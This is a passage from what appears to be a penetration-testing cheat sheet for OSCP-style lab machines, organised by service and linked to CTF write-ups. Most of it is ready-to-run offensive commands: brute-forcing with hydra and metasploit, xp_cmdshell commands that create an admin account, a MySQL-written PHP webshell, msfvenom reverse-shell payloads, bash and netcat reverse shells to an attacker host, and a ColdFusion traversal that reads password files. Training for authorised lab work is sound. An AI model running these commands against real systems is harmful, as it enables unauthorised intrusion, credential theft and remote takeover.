2020-12-27 ! -newermt 2020-12-30 -type f 2>/def/null ``` [+] https://www.tripwire.com/state-of-security/security-data-protection/passing-offensive-security-certified-professional-exam-oscp/ --- <a name="enumerate_nmap_initial"></a> #### enumerate_nmap_initial [⇡](#enumerate) run nmap initial scans ```shell sudo nmap -Pn -sC -sV -O -oN initial <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_tcp"></a> #### enumerate_nmap_tcp [⇡](#enumerate) run nmap full tcp scans ```shell nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_udp"></a> #### enumerate_nmap_udp [⇡](#enumerate) run nmap full udp scans ```shell nmap -Pn -sU -p- -oN udp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_proto_distcc"></a> #### enumerate_proto_distcc [⇡](#enumerate) ```shell msf: exploit/unix/misc/distcc_exec ``` --- <a name="enumerate_proto_dns"></a> #### enumerate_proto_dns [⇡](#enumerate) ```shell reverse lookup to find all hostnames associated with an ip: dig +noall +answer -x <ipaddress> @<dnsserver> dns enumeration: dnsenum -o outputfile -f /usr/share/dnsrecon/namelist.txt -o outputfile domain bruteforce: nmap -p 80 --script dns-brute.nse <domain.name> python dnscan.py -d <domain.name> -w ./subdomains-10000.txt zone transfer: dig axfr @<dnsserver> <domain.name> host -t axfr <domain.name> <dnsserver> host -l <domain.name> <dnsserver> ``` --- <a name="enumerate_proto_finger"></a> #### enumerate_proto_finger [⇡](#enumerate) ```shell finger username@<targetip> ``` --- <a name="enumerate_proto_ftp"></a> #### enumerate_proto_ftp [⇡](#enumerate) check if version is vulnerable and exploit is available. check if anonymous access is enabled. check if read permission for sensitive files. check if write permission within webroot/uploads or other critical directories. check if ftp root directory is also http root directory and upload php reverse shell. remember - binary and ascii transfer mode switch ```shell ftp passive mode: ftp -p 192.168.92.192 bruteforce ftp login: use auxiliary/scanner/ftp/ftp_login misc: nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 <targetip> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <targetip> hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f <targetip> ftp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9 --- <a name="enumerate_proto_http"></a> #### enumerate_proto_http [⇡](#enumerate) identify web server, technology, application. identify versions. run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source code. check for default creds, lfi/rfi, sqli, wordpress ```shell bash /usr/share/sparta/scripts/x11screenshot.sh <targetip> cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage cewl https://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage curl -i <targetip> ## check http response headers gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<taregtip>/ -t 20 -U <username> -P <password> hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get / hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head / nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip> nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT] w3m -dump <targetip>/robots.txt wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt" ## identify web technology ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 2. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | | 3. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 4. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_ldap"></a> #### enumerate_proto_ldap [⇡](#enumerate) ```shell ldapsearch -x -s base -h <targetip> -p 389 ``` --- <a name="enumerate_proto_mssql"></a> #### enumerate_proto_mssql [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt -u -f <targetip> mssql hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mssql://<targetip> nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip> nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user anderson cooper /add" nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators anderson /add" nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa <targetip> ``` --- <a name="enumerate_proto_mysql"></a> #### enumerate_proto_mysql [⇡](#enumerate) ```shell nmap --script=mysql-* <targetip> bruteforce: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip> nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <targetip> create a reverse shell: select '<?php exec($_GET["cmd"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php' udf: if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file is present, we can privesc nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <targetip> -p <targetport> hydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt -u -f <targetip> mysql ``` --- <a name="enumerate_proto_nfs"></a> #### enumerate_proto_nfs [⇡](#enumerate) ```shell nmap -sV --script=nfs-* <targetip> showmount -e <targetip> ``` --- <a name="enumerate_proto_oracle"></a> #### enumerate_proto_oracle [⇡](#enumerate) ```shell msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E tnscmd10g status -h <targetip> hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 oracle-listener ``` --- <a name="enumerate_proto_postgres"></a> #### enumerate_proto_postgres [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt -u -f <targetip> postgres hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 postgres ``` --- <a name="enumerate_proto_rdp"></a> #### enumerate_proto_rdp [⇡](#enumerate) ```shell perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport> ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip> ``` --- <a name="enumerate_proto_rpc"></a> #### enumerate_proto_rpc [⇡](#enumerate) ```shell rpcinfo -p <targetip> ``` --- <a name="enumerate_proto_smb"></a> #### enumerate_proto_smb [⇡](#enumerate) ```shell locate all smb scripts on kali and run them to gather details: locate *.nse | grep smb try enum4linux to get open shares, permissions and local users: enum4linux -a <targetip> nbtscan -vhr <targetip> scans: nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip> nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip> null sessions: bash -c "echo 'srvinfo' | rpcclient -U % <targetip>" groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip> users: bash -c "echo 'enumdomusers' | rpcclient -U % <targetip>" admins: net rpc group members "Domain Admins" -U % -I <targetip> shares: nmap -vv -p139,445 --script=smb-enum-shares <targetip> sessions: nmap -vv -p139,445 --script=smb-enum-sessions <targetip> policies: nmap -vv -p139,445 --script=smb-enum-domains <targetip> version: use auxiliary/scanner/smb/smb_version bruteforce: use auxiliary/scanner/smb/smb_login bash -c "echo 'enumdomusers' | rpcclient <targetip> -U%" bash -c "echo 'srvinfo' | rpcclient <targetip> -U%" bash /usr/share/sparta/scripts/smbenum.sh <targetip> enum4linux <targetip> nbtscan -v -h <targetip> net rpc group members "Domain Admins" -I <targetip> -U% nmap -p<targetport> --script=smb-enum-domains <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-shares <targetip> -vvvvv nmap -sV -Pn -vv -p <targetport> --script=smb-vuln* --script-args=unsafe=1 <targetip> python /usr/share/doc/python-impacket-doc/examples/samrdump.py <targetip> <targetport>/SMB smbclient -L <targetip> smbclient //<targetip>/admin$ -U john smbclient //<targetip>/ipc$ -U john smbclient //<targetip>/tmp smbclient \\<targetip>\ipc$ -U john winexe -U username //<targetip> "cmd.exe" --system ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smb_anonymous_access"></a> #### enumerate_proto_smb_anonymous_access [⇡](#enumerate) open shares, anonymous logins ```shell # connect to and explore smb share: smbclient -N -L \\\\<targetip> smbclient -N \\\\<targetip>\\$share # look for null sessions "allows sessions using username '', password ''", use smbclient to connect and explore smb share: enum4linux -a <targetip> smbclient -U "" //<targetip>/share$ (password: "") smbclient //<targetip>/share$ -U lazysysadmin -p 445 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smtp"></a> #### enumerate_proto_smtp [⇡](#enumerate) ```shell smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> # send email: swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.92.167:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" ``` --- <a name="enumerate_proto_snmp"></a> #### enumerate_proto_snmp [⇡](#enumerate) ```shell snmpcheck -t <targetip> nmap -sU -p 161 --script=*snmp* <targetip> xprobe2 -v -p udp:161:open <targetip> use auxiliary/scanner/snmp/snmp_login use auxiliary/scanner/snmp/snmp_enum enumerate open ports, running services and applications: snmpwalk -v2c -c public <targetip> . snmp-check -t 5 -c public <targetip> scan using multiple community strings: echo public >community echo private >>community echo manager >>community for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips onesixtyone -c community -i ips onesixtyone -c /usr/share/wordlists/dirb/small.txt <targetip> enumerate windows users: snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25 for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk -v 1 -c $i 192.168.1.200; done | grep -e "Timeout" enumerate current windows processes: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2 enumerate windows open tcp ports: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3 enumerate installed software: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2 ``` --- <a name="enumerate_proto_sql"></a> #### enumerate_proto_sql [⇡](#enumerate) ```shell locate all sql scripts on kali and run them to gather details: locate *.nse | grep sql ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_sql_ssis_dtsconfig"></a> #### enumerate_proto_sql_ssis_dtsconfig [⇡](#enumerate) The `.dtsConfig` files are used by [SQL Server Integration Services (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and can contain plaintext credentials for SQL users. ```shell cat *.dtsConfig ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_ssh"></a> #### enumerate_proto_ssh [⇡](#enumerate) ```shell authorized_keys: ssh-keygen -t rsa -b 2048 enter a custom filename copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys ssh -i <filename>.pub <username>@<targetip> ssh enum: msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254 msf auxiliary(scanner/ssh/ssh_enumusers) > run ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_telnet"></a> #### enumerate_proto_telnet [⇡](#enumerate) ```shell nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s <targetip> use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_version) > set THREADS 254 msf auxiliary(telnet_version) > run use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > set BLANK_PASSWORDS false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt msf auxiliary(telnet_login) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_login) > set THREADS 254 msf auxiliary(telnet_login) > set USER_FILE users.txt msf auxiliary(telnet_login) > set VERBOSE false msf auxiliary(telnet_login) > run ``` --- <a name="enumerate_proto_webdav"></a> #### enumerate_proto_webdav [⇡](#enumerate) ```shell default pass for xampp: wampp/xampp test uploading different file extensions: davtest -url http://10.11.1.10 test uploading different file extensions, with given creds: davtest -url http://10.11.1.10 -auth username:password remove files uploaded during test: davtest -cleanup create a reverse shell (asp file even if not allowed) connect to webdav share, bypass upload restrictions: cadaver http://10.11.1.10 mkdir temp cd temp put revshell.asp revshell.txt copy revshell.txt revshell.asp open nc to catch reverse shell connection browse webdav share and open uploaded file ``` --- <a name="exploit"></a> ### ⚙️ Exploit [🡑](#ttps) <a name="exploit_apache_tomcat"></a> #### exploit_apache_tomcat [⇡](#exploit) leverage Tomcat Web Application Manager to deploy a malicious .war file that spawns a reverse shell ```shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f war >backdoor.war # deploy war file through tomcat manager # start netcat listener and visit the link for uploaded jsp file to trigger webshell jar -xvf backdoor.war http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename in war archive w/ extension> ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="exploit_bash_reverseshell"></a> #### exploit_bash_reverseshell [⇡](#exploit) spawn a bash reverse shell to gain interactive access on the target system ```shell nc -nlvp <attackerport> rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip> <attackerport> >/tmp/f ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="exploit_bof"></a> #### exploit_bof [⇡](#exploit) create a bof exploit to execute arbitrary code and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_cloudme_bof"></a> #### exploit_cloudme_bof [⇡](#exploit) the CloudMe version 1.11.12 is vulnerable to a buffer overflow that could be used to gain interactive access on the target system, possibly with elevated privileges ```shell msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport> -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai sudo nc -nlvp <attackerport> python 48389.py ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48389 --- <a name="exploit_cmdexec"></a> #### exploit_cmdexec [⇡](#exploit) execute arbitrary commands via a command execution vulnerability and gain interactive access on the target system ```shell nc -nlvp <attackerport> bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_coldfusion_dirtraversal"></a> #### exploit_coldfusion_dirtraversal [⇡](#exploit) coldfusion 8 is vulnerable to a directory traversal and exposes SHA1 hash of the user password ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://www.exploit-db.com/exploits/14641 --- <a name="exploit_coldfusion_scheduledtasks"></a> #### exploit_coldfusion_scheduledtasks [⇡](#exploit) coldfusion 8 allows to 